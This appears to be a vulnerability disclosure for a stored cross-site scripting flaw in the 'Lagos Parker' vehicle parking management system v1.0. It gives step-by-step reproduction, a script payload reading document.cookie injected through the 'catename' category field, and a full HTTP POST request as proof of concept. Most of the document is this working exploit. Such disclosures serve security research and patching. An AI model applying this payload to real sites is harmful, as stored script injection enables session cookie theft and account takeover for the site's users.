    # Vendor Homepage: https://www.sourcecodester.com/php/14415/vehicle-parking-management-system-project-phpmysql-full-source-code.html
    # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/lagos-parker-fullsource-code.zip
    # Version: v1.0
    # Tested on: Ubuntu
    
    
    *Steps to Reproduce:*
    1) Login with Admin Credentials and click on the '*Manage category*' button.
    2) Click on the '*Add Categories*'  button.
    3) Now add the 'Ba1man' in the input field of '*Category*' and intercept it with Burp Suite.
    4) Now add the following payload input field of *Category *as a parameter name is *catename*
    
    Payload:  ba1man"><script>alert(document.cookie)</script>
    
    4) Click On Save
    5) Now go to '*Manage category > View Categories*'
    5) XSS payload is triggered.
    
    *proof-of-concept:*
    1) Request:
    
    POST /lagos_parker/parker/addcategory.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
    Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/lagos_parker/parker/addcategory.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 82
    Connection: close
    Cookie: PHPSESSID=6432hpio6v07igni4akosvdbmn
    Upgrade-Insecure-Requests: 1
    catename=ba1man"><script>alert(document.cookie)</script>&submit=

Tag

#ubuntu